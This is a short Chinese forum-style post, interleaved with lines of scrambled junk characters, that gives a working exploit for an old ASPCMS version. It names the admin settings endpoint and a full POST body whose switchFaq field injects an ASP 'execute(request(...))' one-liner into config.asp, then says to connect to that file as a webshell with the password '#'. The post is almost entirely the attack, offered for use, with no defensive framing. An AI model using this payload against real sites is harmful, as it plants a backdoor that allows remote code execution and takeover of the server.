老的ASPCMS版本的秒杀拿SHELL漏洞
5 c. J4 K8 J# Z6 R9 P* Q, A9 P+ D$ b: t% P9 A" T, @
找到后台。。。然后( T! `1 k" {5 g+ P3 B
( m7 v! G8 ~) [1 V. D/ y) b
/admin/_system/AspCms_SiteSetting.asp?action=saves
6 F0 ?$ ~+ s# \5 z& X3 g5 m1 z4 Q
: Q: M8 G% f: F( c/ o& M直接POST0 ]" i( P6 N! W' U9 c
4 J: k; Q _8 f7 j: Y8 \runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
' {" C1 e# {% b2 y, w # l W* A" _4 k* t3 p6 D/ i
再连接配置文件config.asp 密码为#4 I& J( C1 D6 |2 a8 E+ @/ s0 v
|